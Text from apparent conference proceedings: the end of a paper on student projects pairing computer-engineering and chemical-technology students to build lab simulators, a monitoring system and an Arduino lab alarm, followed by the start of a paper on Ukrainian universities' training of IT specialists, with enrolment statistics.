Corrective | The ability to adjust one's activities in a timely manner
Educational | Formation of independence as a character trait
The article [11] shows that working under the conditions of digitalization of the educational sphere requires complex transformations both in the school system and in the system of pedagogical education under the influence of progressive digital technologies. The authors [12] propose a structure of the educational process of a new type, in which the educational activity must coincide with the generalized structure of the activity; the correctness of this hypothesis is confirmed by the successful testing of the concept on the example of the continuous geometric and graphic training of students of a technical university. The importance of developing the competencies of an engineering university teacher in accordance with the trends of modern education is obvious [13]. The authors [14] describe the development and realization of a new strategy of continuing engineering education on the grounds of transdisciplinarity and the combination of engineering, economic, linguistic, and IT knowledge.

In addition, the issue of interaction between different specialists is very important. Some of them act as customers, others as developers or project executors. Taking modern trends into account, the executors are, as a rule, IT specialists, while the customers are specialists from other areas. However, the customer may have problems with the exact formulation of the requirements and their coordination with the contractor, and the executors may have problems with coordinating and implementing these requirements, as well as with the exact observance of deadlines. It is necessary to give students the opportunity to gain such experience during their studies.

Thus, the task of this work is to study the possibility of interaction between students of various specialties as they implement projects in customer and contractor roles. The goal is for students to gain experience of interaction in real projects. Below, examples are considered of cooperation between students majoring in 123 - Computer Engineering and 161 - Chemical Technology and Engineering in the design and development of software products and specialized computer systems.
2 Materials and Methods

The methods used in the development of the projects were computer modeling; writing, debugging, and testing programs and sketches; practical testing of the designed objects; and experimental laboratory studies on the developed equipment.

The use of a computer monitoring system in laboratories, combined with experimental research, is the basis for the most effective use of the available equipment. In general, the basis of the organizational structure of monitoring is an automated information system (AIS) created on the basis of computer tools. The main issue in the organization of an AIS is its informational, technical, and mathematical support. Information enters the AIS through communication channels from receiving devices: sensors of various designs and functional purposes. From the receiving device, the information undergoes hardware noise filtering, is subjected to primary processing using standard programs, and is interpreted. The information then enters the database, where it is accumulated and used for further processing (a minimal sketch of this signal path is given below). The technical support of the AIS is a complex of hardware means of information storage and processing.
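The following JavaScript sketch illustrates that signal path under stated assumptions: all names are illustrative and a simple moving average stands in for the hardware noise filtering and the standard processing programs; this is not the actual AIS software.

```javascript
// Raw sensor reading -> noise filtering -> primary processing -> storage.

// A simple moving average stands in for hardware noise filtering.
function movingAverage(samples, windowSize = 5) {
  return samples.map((_, i) => {
    const window = samples.slice(Math.max(0, i - windowSize + 1), i + 1);
    return window.reduce((sum, v) => sum + v, 0) / window.length;
  });
}

// Primary processing: turn the filtered value into an interpreted record.
function interpret(sensorId, value) {
  return { sensorId, value, timestamp: Date.now() };
}

const database = []; // stands in for the accumulation and storage block

function ingest(sensorId, rawSamples) {
  const filtered = movingAverage(rawSamples);
  const record = interpret(sensorId, filtered[filtered.length - 1]);
  database.push(record); // accumulated for further processing
  return record;
}

ingest("temperature-5", [21.2, 21.4, 35.0, 21.3, 21.5]); // spike is smoothed
```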
The mathematical support of the AIS is built on the basis of three blocks of programs: search with statistical data processing, a predictive and diagnostic block, and optimization. The search programs must perform the functions of entering new data about the objects of observation into the monitoring system, storing them, carrying out primary analysis, and providing access to already existing data.

Among the Arduino modules in use at the time (Arduino Uno, Arduino Leonardo, Arduino Ethernet, Arduino Mega 2560, Arduino Mini, Arduino Micro, Arduino Due, LilyPad Arduino, Arduino Pro, Arduino Yún, Arduino NANO 2.x, Arduino NANO 3.0), the Arduino NANO 3.0 was chosen for designing the robot. The advantages of this module are its small size and its ATmega328 microcontroller with 32 KB of memory (of which 2 KB is allocated to the bootloader). The connection to the PC is made via a mini-USB cable. This board was chosen because its miniature dimensions still leave room to mount a video camera.

The creation of the AIS was based on an analysis of the object of study. The control object was a chemical-technological plasma unit (CTPU) designed for the production of oxygen-containing nanosized compounds. A feature of this CTPU was its use in mini-productions (laboratories) combined with experimental research work. Note that the most easily controlled methods are based on the use of various electrochemical processes [15]. In technologies based on the use of non-equilibrium contact plasma, the latter is used to treat solutions in order to obtain new compounds under conditions [16, 17] that favor the formation of nanodispersed compounds of various compositions [18, 19].

The plasma-chemical reactor, in which the main transformations in liquid media take place, is a device that combines a whole complex of processes. The main ones are electrochemical, plasma-chemical, and chemical processes, cavitation of the gas bubbles formed as a result of water decomposition, diffusion, heat transfer, etc. The general scheme of the processes is shown in [17]. Note that the main processes leading to the appearance of reaction products occur at the phase boundary and at the cathode. However, when solutions are used, chemical processes can occur in the entire volume of the liquid, and it is therefore necessary to determine the optimal parameters of the processes.
3 Results

It is known that a student majoring in computer engineering must learn to [20]:

• understand and create computer circuits;
• know the architecture of computers;
• create application and system programs;
• understand how peripherals are built and how they work;
• design complex computer systems;
• analyze and model systems;
• understand the theory of information and coding;
• understand the theory of automatic control;
• use software development standards;
• use methods and tools of computer information technology;
• use methods and tools to automate the design of computer systems;
• organize parallel and distributed computations.

Accordingly, a student majoring in 161 - Chemical Technology and Engineering must in turn learn [21]:

• the basics of physics, chemistry, higher mathematics, geology, hydrology, ecology, and other engineering fields for modeling and solving specific engineering problems;
• the theoretical provisions and laws of chemistry, physics, thermodynamics, and chemical kinetics under production conditions, for calculating physicochemical data and for selecting and justifying optimal parameters in the preparation of technological regulations or specifications;
• to determine the physicochemical parameters of technological processes and make decisions on their adjustment;
• to develop new and modernize existing chemical-technological schemes for obtaining target products;
• to control the technological parameters of the chemical-technological process and make decisions on adjusting the technological regime;
• to monitor the radiation situation with the help of devices and systems of radiation control;
• to organize and control the nuclear, environmental, and radiation safety of facilities and territories;
• to conduct the technological process of liquid radioactive waste processing;
• to carry out the decontamination of surfaces of different configurations;
• to perform laboratory tests;
• to determine the physical and chemical indicators of drinking and natural water quality;
• to analyze and control the process of wastewater treatment;
• to operate and inspect the technical condition of facilities and of technological and ancillary equipment for wastewater treatment;
• to develop technological schemes of sewage and industrial water treatment, taking modern equipment into account.

Therefore, the most appropriate tasks for students majoring in 123 - Computer Engineering in this case are the development of computer simulators of laboratory installations or production lines, the development of specialized computer systems for experiments or laboratories, and the development of computer systems for process monitoring [22]. At the same time, students and postgraduate students majoring in 161 - Chemical Technology and Engineering learn to develop a technical task with detailed requirements and to work with contractors, while students majoring in 123 - Computer Engineering learn to work with the customer while carrying out the tasks. Let us consider the student developments that have emerged from this collaboration.

3.1 Computer Simulation

Computer simulation of the chemical-technological processes used in training helps to significantly improve the speed and quality of training. The simulator model of the system presented in Fig. 1 is designed for the technological process of obtaining nanosized cobalt compounds.
Example of working with the model:

1. Enter data on the volumes of the incoming substances (Fig. 1(a), (b)).
2. If the entered value is a string, the program reports the error, indicating the field in which it was made.
3. If the value does not fall within the software range, the weight sensor "lights up" in red.
4. The user (instructor) can artificially put the system into a failure state at any time by pressing the "Break" key: the parameter monitored by the selected sensor goes out of norm, for example, a discrepancy in residue level or temperature, or loss of cooling (Fig. 1(d), (e)).
5. The user can also restore the state by pressing the "Fix" key (Fig. 1(d)).
6. At each point in time, the set of states of every sensor of the operating component is displayed in the right corner, where "True" means compliance with the norm and "False" means non-compliance (Fig. 1(c), (d), (e), (f)).

The simulator was implemented with standard Web development languages: HTML, CSS, and JavaScript (a sketch of the input checks is given below).

3.2 Monitoring System

In the general case, a continuous monitoring scheme should operate during a laboratory experiment, making it possible to obtain the maximum amount of information in the course of the experiment. The object of control is a chemical-technological system designed for the production of cobalt oxide compounds; its block diagram, and an approximate block diagram built on its basis, are presented in Fig. 2. As a result of processing the information received during experiments, we obtain dependences in the form of a set of mathematical equations reflecting the dependence of the output quantities on the input ones, supplemented by the restrictions imposed on these quantities, the conditions of physical feasibility, the requirements of operational safety, and the connections with other objects; together these constitute a mathematical model of the process. For the process of obtaining products, the model is supplemented by a control algorithm that provides output with the specified indicators.

In general, the monitoring system (Fig. 3) is a system of sensors connected by a common bus to a controller and a monitoring unit. From the sensors of the experimental installation, signals of different physical nature, at the points in time set by the sensor interrogator, are fed to the input of the signal-code conversion. They then pass through the controller to the monitoring unit, and from it to the data collection and storage unit and the decision-making unit. If the indicators do not meet the standards, the expert system included in the decision-making unit determines the cause and diagnoses the fault. In addition, owing to the intensive use of the installation, we consider it appropriate to include in the monitoring system the ability to assess the status of individual components (equipment) of the system, such as monitoring the current values of compressor performance and pressure against the design values.
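Referring back to the input checks of Sect. 3.1 (steps 2–3) and the instructor's "Break"/"Fix" controls (steps 4–5), the following is a minimal JavaScript sketch of that logic; the field name, range values, and sensor identifiers are illustrative assumptions, not the students' actual code.

```javascript
const FIELDS = {
  cobaltSaltVolume: { min: 0.5, max: 50 }, // hypothetical software range
};

function validateField(name, rawValue) {
  const value = parseFloat(rawValue);
  if (Number.isNaN(value)) {
    // Step 2: a string was entered; report the error and the offending field.
    return { ok: false, message: `Error in field "${name}": a number is expected` };
  }
  const { min, max } = FIELDS[name];
  if (value < min || value > max) {
    // Step 3: outside the software range; the weight sensor "lights up" red.
    return { ok: false, highlightRed: true, message: `"${name}" is out of range` };
  }
  return { ok: true, value };
}

// Steps 4-5: "Break" forces a simulated failure, "Fix" restores the norm.
const sensorStates = { levelSensor: true, coolingSensor: true }; // true = norm
const breakSensor = (id) => { sensorStates[id] = false; };
const fixSensor = (id) => { sensorStates[id] = true; };

console.log(validateField("cobaltSaltVolume", "abc").message);
breakSensor("coolingSensor");
console.log(sensorStates); // { levelSensor: true, coolingSensor: false }
```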
Fig. 1. Control system model for the technological process of obtaining nanosized cobalt compounds
Fig. 2. Approximate block diagram of the process of obtaining cobalt compounds using a plasma-chemical reactor: 1 – sensor, 2 – tachometer, 3 – SO₄²⁻ reaction sensor, 4 – liquid sensor, 5 – temperature sensor, 6 – strain gauge, 7 – pressure sensor, 8 – temperature sensor, 9 – psychrometer, 10 – mixing tub, 11 – centrifuge, 12 – washing tank, 13 – plasma-chemical reactor with built-in sensors, 14 – compressor, 15 – heat exchanger, 16 – filter/dryer, 17 – packaging
The result is transmitted to the experimental data processing subsystem, which transmits control signals over the controller bus to the controlled components. Fault information is displayed in the GUI subsystem, and the measurement data are entered into the database. The central element of the system is the controller, which performs the following functions:

• receiving information from sensors;
• logical processing of analog and discrete information;
• calculation of the actual values of parameters;
• checking the actual values of parameters for compliance with the regulatory norms;
• formation of control signals.

The interface provides:
• display of parameters in graphical form;
• formation of reports on deviations of parameters from the norms of the technological regulations;
• formation and display of recommendations for adjusting the technological process based on the values of the measured parameters;
• archiving of the received information with a set period, with display of archived data on request.

The use of a computer monitoring system in mini-productions (laboratories) combined with experimental research is a serious aid to the most efficient use of existing equipment. This is especially true for the development of technologies based on the use of contact non-equilibrium low-temperature plasma. By reducing the time needed for research, by compiling a more complete picture of the process from the full set of recorded characteristics, and by reducing the material costs caused by improper operation of equipment, the cost of developing new technologies is significantly reduced.

Fig. 3. Block diagram of the monitoring system of the installation for the production of cobalt compounds

3.3 The Computer Simulator of the Laboratory Plasma-Chemical Installation Intended for Processing Liquid Media

The software model reflects the main elements of the actual installation, takes into account the performance of the sensors, and allows setting the quantitative parameters that affect the operation of the installation (Fig. 4). In implementing this simulator, we used web development languages: HTML, CSS, and JavaScript. The CSS framework Materialize was also used to style custom components. Norm indicators (see the sketch after this list):

• range of current strength values: [10; 150] mA;
• range of air pressure values: [−0.9; −0.6] atm.
Fig. 4. Computer simulator of the laboratory plasma-chemical reactor designed for processing liquid media
During development, two main difficulties arose:

• managing and updating a large number of DOM elements in real time, which was solved with the help of JavaScript libraries and frameworks;
• creating an animated visualization of the combustion process and of filling the reactor with liquid, which was solved with CSS animation.

3.4 Use in the Laboratory Complex of a Computer System Based on the Arduino Microprocessor System

Chemical research laboratories are characterized by high requirements for fire, explosion, and intrusion protection. It is thus possible to formulate the requirements that the alarm system must meet:

• reporting theft or intrusion (using an audible siren);
• support for external systems such as a sound siren and a light alarm;
• autonomous operation without an external power supply;
• ability to report a fluid leak;
• ability to report a gas leak;
• ability to connect sensors indicating hazardous substances.

Note that Arduino is an open electronic platform that includes so-called starter kits and open-source software designed for quickly creating interactive electronic devices. Among the Arduino modules currently available (Arduino Uno, Arduino Leonardo, Arduino Ethernet based on the ATmega328, Arduino Mega 2560, Arduino Mini, Arduino Micro, Arduino Due, LilyPad Arduino, Arduino Pro, Arduino Yún [23–25]), the best fit is the Arduino Uno, which offers sufficient features for the task at an attractive cost. The alarm meeting these requirements was built from (Fig. 5):

• an Arduino module;
• a set of functional sensors;
• an autonomous power supply;
• external actuators.

When one of the connected sensors is triggered, the signal is transmitted to the processor of the Arduino module. Using the uploaded user software, the microprocessor processes it according to a certain algorithm (a sketch of such decision logic is given after the component list below). As a result, a command can be generated to start an external actuator. If necessary, a special GSM module can be connected to the Arduino module via an expansion board so that warning signals can be sent to the owner of the protected laboratory; it holds a SIM card from one of the cellular operators. The following components were used to create the Arduino security system:
• Arduino Uno board;
• high-contrast 16 × 2 LCD display;
• 4 × 4 keypad;
• 10–20 kΩ potentiometer;
• three reed switches;
• three 2-contact screw terminals;
• HC-SR04 ultrasonic sensor.
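As referenced above, the following is a minimal sketch of the kind of decision algorithm the firmware runs; hardware I/O is abstracted away, and all sensor names, thresholds, and command strings are illustrative assumptions rather than the actual firmware.

```javascript
let armed = true;

function decide(readings) {
  const actions = [];
  if (!armed) return actions;
  if (readings.reedSwitchOpen) actions.push("SIREN_ON", "GSM_ALERT:intrusion");
  if (readings.distanceCm < 50) {
    actions.push("SIREN_ON", "LIGHT_ALARM_ON"); // movement seen by the HC-SR04
  }
  if (readings.fluidLeak) actions.push("GSM_ALERT:fluid-leak");
  if (readings.gasLeak) actions.push("SIREN_ON", "GSM_ALERT:gas-leak");
  return [...new Set(actions)]; // deduplicate commands for the actuators
}

console.log(decide({ reedSwitchOpen: false, distanceCm: 32, fluidLeak: false, gasLeak: true }));
// [ 'SIREN_ON', 'LIGHT_ALARM_ON', 'GSM_ALERT:gas-leak' ]
```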
Fig. 5. Wiring diagram of modules
The design data of this Arduino-based burglar alarm can serve as a basis for developing burglar alarm systems. The computer alarm system can be used in various industries, and unlike other similar systems its cost is much lower. It can also be easily integrated into other alarm systems and adapted to the user. As we can see, all the above developments are of an applied nature and are intended for use by students and graduate students of specialty 161 - Chemical Technology and Engineering. A survey of students majoring in 123 - Computer Engineering showed that all students who worked on the above developments improved their knowledge of the relevant subjects and gained confidence in their abilities.
4 Discussion

As a result of implementing the projects, the students acquired practical development skills. Participation in real projects allowed them to master a number of competencies, which undoubtedly raised their level as specialists. Thus, the design of a plant for the production of oxygen-containing cobalt compounds made it possible to work through several technology options and determine the most cost-effective ones in terms of raw materials and associated costs; in addition, the resulting scheme is a simulator that can be used to train students of specialty 161 - Chemical Technology and Engineering, while students of specialty 123 - Computer Engineering gained experience of working with a customer from another field. The development of a computer simulator for the laboratory plasma-chemical installation made it possible to significantly speed up the training of students of specialty 161 - Chemical Technology and Engineering on this laboratory equipment, and students of specialty 123 - Computer Engineering gained experience in working with non-standard equipment. During the development of the simulator, students of specialty 123 - Computer Engineering were able to make a number of suggestions for improving the installation. The development of the laboratory alarm system is of a practical nature and, in addition to the experience already gained by the students of specialty 123 - Computer Engineering, allows additional components to be introduced later, when new customer requirements arise. The robot-videocart, developed by students of specialty 123 - Computer Engineering, allows video surveillance and video recording in the laboratory, both during experiments and while students perform laboratory work. Thus, we can speak of the usefulness of such projects both for students of specialty 123 - Computer Engineering and for students of specialty 161 - Chemical Technology and Engineering, both in terms of gaining experience in interaction and communication and in terms of improving students' professional skills.
5 Conclusions

Independent work (in the form of applied developments) shapes, in students of different fields of study, professionally oriented skills, communication skills in cooperation, and customer-contractor relationship skills within the active cognitive creative activity of students. This approach exercises all the functions of independent work: the cognitive, prognostic, educational, corrective, and independent ones. It should be noted that this approach significantly broadens the horizons of the students-performers. In addition, it increases students' self-esteem and confidence in their abilities. The most appropriate tasks for students majoring in 123 - Computer Engineering, in the case of cooperation with students and postgraduate students majoring in 161 - Chemical Technology and Engineering, are the development of computer simulators of laboratory installations and production lines, the development of specialized computer systems for experiments and laboratories, and the development of computer systems for process monitoring. At the same time, students and postgraduate students majoring in 161 - Chemical Technology and Engineering learn to develop a technical task with detailed requirements and to work with contractors, while students majoring in 123 - Computer Engineering learn to work with the customer while carrying out the tasks.
Further research should be devoted to strengthening the links between different specialties, which will improve the quality of training and the professional level of specialists. It will also allow the educational programs to be supplemented with new disciplines at the master's and postgraduate levels.
References

1. Orishev, J., Burkhonov, R.: Project for training professional skills for future teachers of technological education. Ment. Enlightenment Sci. Methodol. J. 2021(2), 139–150 (2021)
2. Shomirzayev, M.K.: Developing educational technologies in school technology education. In: Next Scientists Conferences, pp. 14–23 (2022)
3. Estriegana, R., Medina-Merodio, J.A., Barchino, R.: Student acceptance of virtual laboratory and practical work: an extension of the technology acceptance model. Comput. Educ. 135, 1–14 (2019)
4. Rivera, F.F., Pérez, T., Castañeda, L.F., Nava, J.L.: Mathematical modeling and simulation of electrochemical reactors: a critical review. Chem. Eng. Sci. 239, 16622 (2021)
5. Sergeyeva, O., Pivovarov, A.: Analysis of prospects to obtaining nanosized metal compounds by treatment of the water solution by contact non-equilibrium plasma. Technol. Audit Prod. Reserves 3(3), 53–57 (2016)
6. Tushar, W., et al.: A motivational game-theoretic approach for peer-to-peer energy trading in the smart grid. Appl. Energy 243, 10–20 (2019)
7. Stepanova, O.P., et al.: Value-motivational sphere and prospects of the deviant behavior. Int. J. Educ. Inf. Technol. (2018). ISSN 2074-1316
8. Morgan, G.: 'Meaning and soul': co-working, creative career and independent co-work spaces. In: Pathways into Creative Working Lives, pp. 139–158. Palgrave Macmillan, Cham (2020)
9. Rasulova, Z.: Conditions and opportunities of organizing independent creative works of students of the direction technology in higher education. Int. J. Sci. Technol. Res. 9(3), 5060–5062 (2020)
10. Aladyshkin, I.V., Kulik, S.V., Odinokaya, M.A., Safonova, A.S., Kalmykova, S.V.: Development of electronic information and educational environment of the university 4.0 and prospects of integration of engineering education and humanities. In: Anikina, Z. (ed.) IEEHGIP 2022. LNNS, vol. 131, pp. 659–671. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-47415-7_70
11. Tretyakova, T.V., Vlasova, E.Z., Barakhsanova, E.A., Prokopyev, M.S., Sorochinsky, M.A.: Digital education as a new vector of development of education in the northern regions. In: Anikina, Z. (ed.) IEEHGIP 2022. LNNS, vol. 131, pp. 864–870. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-47415-7_93
12. Dreher, R., Kondratyev, V.V., Kazakova, U.A., Kuznetsova, M.N.: New concept of engineering education for sustainable development of society. In: Auer, M.E., Rüütmann, T. (eds.) ICL 2020. AISC, vol. 1329, pp. 819–831. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-68201-9_81
13. Olga, K., Svetlana, B., Julia, K.: The main trends in the development of engineering education: the role of the university teacher in systemic changes. In: Auer, M.E., Tsiatsos, T. (eds.) ICL 2018. AISC, vol. 916, pp. 495–502. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-11932-4_47
14. Sharipov, F.F., Krotenko, T.Y., Dyakonova, M.A.: Transdisciplinary strategy of continuing engineering education. In: Ashmarina, S.I., Mantulenko, V.V., Vochozka, M. (eds.) Engineering Economics Week 2020. LNNS, vol. 139, pp. 480–488. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-53277-2_57
15. Fuller, T.F., Harb, J.N.: Electrochemical Engineering. Wiley, Hoboken (2018)
16. Frolova, L.A., Derimova, A.V.: Factors controlling magnetic properties of CoFe2O4 nanoparticles prepared by contact low-temperature non-equilibrium plasma method. J. Chem. Technol. Metall. 54(5), 1040–1046 (2019)
17. Frolova, L.A.: The mechanism of nickel ferrite formation by glow discharge effect. Appl. Nanosci. 9(5), 845–852 (2018). https://doi.org/10.1007/s13204-018-0767-z
18. Frolova, L., Pivovarov, A., Tsepich, E.: Non-equilibrium plasma-assisted hydrophase ferritization in Fe2+–Ni2+–SO42−–OH− system. In: Fesenko, O., Yatsenko, L. (eds.) Nanophysics, Nanophotonics, Surface Studies, and Applications. SPP, vol. 183, pp. 213–220. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-30737-4_18
19. Frolova, L., Derimova, A., Butyrina, T.: Structural and magnetic properties of cobalt ferrite nanopowders synthesis using contact non-equilibrium plasma. Acta Phys. Pol. A 133(4), 1021–1023 (2018)
20. Standard of higher education of Ukraine, first (bachelor's) level, field of knowledge 12 Information Technologies, specialty 123 Computer Engineering. https://mon.gov.ua/storage/app/media/vishcha-osvita/zatverdzeni%20standarty/123-kompyuterna-inzheneriya.pdf
21. Standard of higher education of Ukraine, first (bachelor's) level, field of knowledge 16 Chemical and Bioengineering, specialty 161 Chemical Technologies and Engineering. https://mon.gov.ua/storage/app/media/vyshcha/standarty/2020/06/17/161Khim.tekhn.ta.inzh.bakalavr-10.12.pdf
22. Zhiyun, Z., Baoyu, C., Xinjun, G., Chenguang, C.: The development of a novel type chemical process operator-training simulator. In: Computer Aided Chemical Engineering, vol. 15, pp. 1447–1452. Elsevier (2003)
23. Sergeyeva, O., Pivovarov, A., Pilyaev, V.: Development of monitoring system for producing oxygen-containing compounds of cobalt by plasmo-chemical method. Bull. NTU "KhPI", Ser. New Solutions Mod. Technol. 18(1190), 153–157 (2016). NTU "KhPI", Kharkiv. https://doi.org/10.20998/2413-4295.2016.18.22
24. Jamieson, P.: Arduino for teaching embedded systems. Are computer scientists and engineering educators missing the boat? In: Proceedings of the International Conference on Frontiers in Education: Computer Science and Computer Engineering (FECS). The Steering Committee of the World Congress in Computer Science, Computer Engineering and Applied Computing (WorldComp), p. 1 (2011)
25. Plaza, P., et al.: Arduino as an educational tool to introduce robotics. In: 2018 IEEE International Conference on Teaching, Assessment, and Learning for Engineering (TALE), pp. 1–8. IEEE (2018)
The Potential of Higher Education in Ukraine in the Preparation of Competitive IT Specialists for the Post-War Recovery of the Country's Economy

Oksana Zakharova(B) and Larysa Prodanova

Cherkasy State Technological University, Cherkasy, Ukraine
{o.zakharova,l.prodanova}@chdtu.edu.ua
Abstract. The rapid recovery of the Ukrainian economy in the post-war period is possible only with a sufficient number of competitive and motivated IT specialists, whose knowledge will not only quickly compensate for the technologies lost in various areas of the country's economic activity through military operations, bombardment, and occupation, but also significantly improve the technical-technological level of the country. To this end, this work carries out a deep analysis of the potential of higher education institutions in Ukraine to train competitive IT specialists. The main problems of Ukrainian universities in the training of IT specialists are substantiated. The focus and content of the educational programs of the leading universities training IT specialists in Ukraine are compared with those of the leading countries of the world. The factors influencing the level of motivation of Ukrainian IT specialists to direct the knowledge acquired during training toward the needs of restoring the economy of Ukraine are determined.

Keywords: Ukraine · field of knowledge 12 Information Technology · students · higher education · IT specialists
1 Introduction

The forced test of the viability of Ukraine's economy, which took place in March 2020–February 2022 as a result of the COVID-19 pandemic, showed that the IT services market has the highest margin of safety and development potential among all economic activities in the country. Thus, a study conducted by experts of the IT Ukraine Association established that in 2021 the IT sector of Ukraine grew by 36% compared to the previous year, and that in 2019–2021 the industry grew by more than 50% in the number of specialists involved in it (Ukraine 2021). Given that more than 80% of the professionals working in the Ukrainian IT services market have a relevant higher education and a sufficient level of English, and that the vast majority of them are young people aged 21–30 (Portrait 2019), establishing the level of progressiveness of IT education in Ukraine becomes quite important in the current economic crisis.
The quality and standard of living, trends in the return to the country of both the population that fled the war and labor migrants, and the speed of Ukraine's accession to the EU will depend on the extent to which IT graduates of Ukrainian universities, from professional and motivational points of view, develop and implement projects aimed at restoring all spheres of life in the post-war period.

The publications of many authors have been devoted to topical aspects of training competitive IT specialists. Iden, J. and Langeland, L. examined the factors of IT professionalization through the implementation of platforms based on best-practice processes (Iden 2010). Opel, S., Netzer, C.M., and Desel, J. proposed an assessment tool to recognize and take into account the previous professional experience and training of IT professionals (Opel 2022). Wiggberg, M., Gobena, E., and Kaulio, M. developed an educational program for the rapid integration of foreigners into the IT industry of the local economy (Wiggberg 2022). Pröbster, M., Hermann, J., and Marsden, N. proposed a project aimed at supporting women IT experts and offering them relevant educational content in the field of digitalization and IT, taking into account the individual context of each woman studying (Pröbster 2018). Proskura, S. and Lytvynova, S. (Proskura 2018) substantiated ways to improve the forms and methods of teaching aimed at creating a holistic system of training information technology specialists in Ukraine, one element of which was self-study. Pasichnyk, V. and Kunanets, N. analyzed the main problems of interaction between IT business and IT education in establishing effective training of specialists in this field in Ukraine and outlined the key points inherent in the educational institutions that trained IT professionals and in the corporations that had successfully positioned themselves in the IT market (Pasichnyk 2015).

While appreciating the results of the research by the above and other well-known authors, it should be emphasized that Russia's military aggression against Ukraine has caused a number of serious problems in the Ukrainian higher education system in general and in the training of IT professionals in particular. These problems are caused primarily by the forced relocation of a significant part of the population of Ukraine and by the destruction of and damage to the material base of educational institutions as a result of hostilities. That is why studying the current capabilities of the higher education system of Ukraine for training competitive IT professionals is an important scientific and practical task. The purpose of this work is to assess the ability and potential of higher education in Ukraine to train IT professionals who can restore and improve the technical and technological level of Ukraine's economy in the post-war period and who are motivated to do so.
2 Materials and Methods

The methodological basis of the article is the logical-dialectical method of cognition of economic phenomena and processes. The research is based on methods of comparative and retrospective analysis. The information base of the research consists of data from the IT Ukraine Association (Ukraine 2021); the Register of subjects of educational activity, in particular the Unified state electronic database on education (Register 2022); the information system Competition: admission campaign 2021–2022 (Information 2022); and the Statistics of Admission Campaigns portal (Statistics 2021).
3 Results

In April 2015, a Resolution of the Cabinet of Ministers of Ukraine approved an updated list of the fields of knowledge and specialties in which higher education students are trained in the country (Resolution 2015). According to the Resolution, within the field of knowledge 12 Information Technology, training was introduced in five specialties: 121 Software Engineering, 122 Computer Science, 123 Computer Engineering, 124 System Analysis, and 125 Cybersecurity. Two years later, in response to the requirements of the IT market, which was developing rapidly in Ukraine, a sixth specialty was created within field of knowledge 12: 126 Information Systems and Technologies. Currently, the contingent of students at the bachelor's and master's levels of full-time, part-time, and distance learning is 80,650 people (Register 2022). At the moment, 164 higher education institutions are involved in the training of IT specialists in Ukraine (Fig. 1).
Fig. 1. Distribution of the number of students (persons) and the number of higher education institutions (units) in Ukraine by specialties in the field of knowledge 12 Information Technology, June 2022. Students by specialty, as recoverable from the chart: 121 – 18,255; 122 – 28,621; 123 – 14,857; 124 – 2,989; 125 – 10,611; 126 – 5,317. Source: (Register 2022)
The largest numbers of students major in 122 Computer Science (35.5%) and 121 Software Engineering (22.6% of the total number of students in field of knowledge 12 in the country). The smallest numbers of students study in the specialties 124 System Analysis (3.7%) and 126 Information Systems and Technologies (6.6% of the total number of students in field of knowledge 12 in the country). At the same time, a fairly strong direct relationship is observed between the number of higher education institutions offering a given specialty and the number of students enrolled in it.
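As a simple arithmetic cross-check, the quoted shares follow directly from the per-specialty counts read from Fig. 1 (the counts sum exactly to the 80,650 quoted above):

```javascript
// Per-specialty student counts as recoverable from Fig. 1 (Register 2022).
const students = {
  "121": 18255, "122": 28621, "123": 14857,
  "124": 2989, "125": 10611, "126": 5317,
};

const total = Object.values(students).reduce((sum, n) => sum + n, 0);
console.log(total); // 80650, matching the total contingent quoted above

for (const [code, n] of Object.entries(students)) {
  console.log(`${code}: ${(100 * n / total).toFixed(1)}%`);
}
// 122: 35.5%, 121: 22.6%, 124: 3.7%, 126: 6.6%, as quoted in the text
```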
education institutions within which training in a certain specialty takes place and the number of students receiving it. Territorial distribution and quantitative characteristics of higher education institutions of Ukraine that provide training for IT professionals are given in Table 1 (Appendices). The table does not include cities whose higher education institutions train IT specialists in less than three specialties within the field of knowledge number 12. The analysis has revealed that the training of IT specialists in Ukraine is carried out in all regions of the country, except for the temporarily occupied and annexed territories. Only 16 higher education institutions provide services in all six specialties of the industry. At the same time, the largest average contingent of students is typical of higher education institutions in Kharkiv. According to the criterion of the contingent of students, it can be concluded that as of June 2022, three of the six IT specialties are in the greatest demand among entrants. Thus, in 13 regions of the country, the most common is specialty number 122, in six regions – number 121. The average number of students in the most common specialty in the city per one higher education institution in the country ranges from 91 people – in Cherkasy, and up to 511 people – in Kharkiv. The lowest values of the extremes of the values of the contingent of students in the institution of higher education, which provides educational services in the most common specialty in the city, are observed in Cherkasy, where their values range from 3 to 154 people. Thus, we can conclude that, firstly, the training of IT professionals is conducted simultaneously throughout Ukraine and, secondly, the demand for educational services in the regions is different. The analysis of the contingent of students in terms of specialties, and in general, allows to establish three leading universities, in which the total contingent of IT students exceeds 5 thousand people (Table 2, Appendices). The fourth place is occupied by National Aviation University, but the contingent of its IT students is only 3606 people and the university does not provide services in specialty number 124, so it is not included in our ranking. All other institutions of higher education have a contingent of students in the IT field of less than 2.5 thousand people. National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute” is the leader among all higher education institutions in Ukraine in terms of the number of students currently receiving IT education in the country and trains 8.8% of the total contingent of IT students in the country. The University is a leader in three specialties: specialty number 121 has 10.8% of the total contingent of students (10.7% of the bachelor’s market and 11.7% of the master’s market of this specialty); specialty number 124 has 18.4% of the total contingent of students (19.3% of the bachelor’s market and 17.6% of the master’s market of this specialty); specialty number 126 has 23.1% of the total contingent of students (24.3% of the bachelor’s market and 23.8% of the master’s market of this specialty). Lviv Polytechnic National University ranks second in the contingent of students and occupies 7.3% of the market for educational services in the IT sector on this indicator. 
The University leads in two specialties: in specialty 122 it has 10.8% of the total contingent of students (8.9% of the bachelor's market and 6.5% of the master's market of this specialty), and in specialty 125 it has 9.5% of the total contingent of students (8.8% of the bachelor's market and 15.9% of the master's market).
Kharkiv National University of Radio Electronics ranks third in student contingent, holding 6.9% of the market for educational services in the IT sector. The university leads in specialty 123, with 9.9% of the total contingent of students (9.6% of the bachelor's market and 10.4% of the master's market of this specialty).

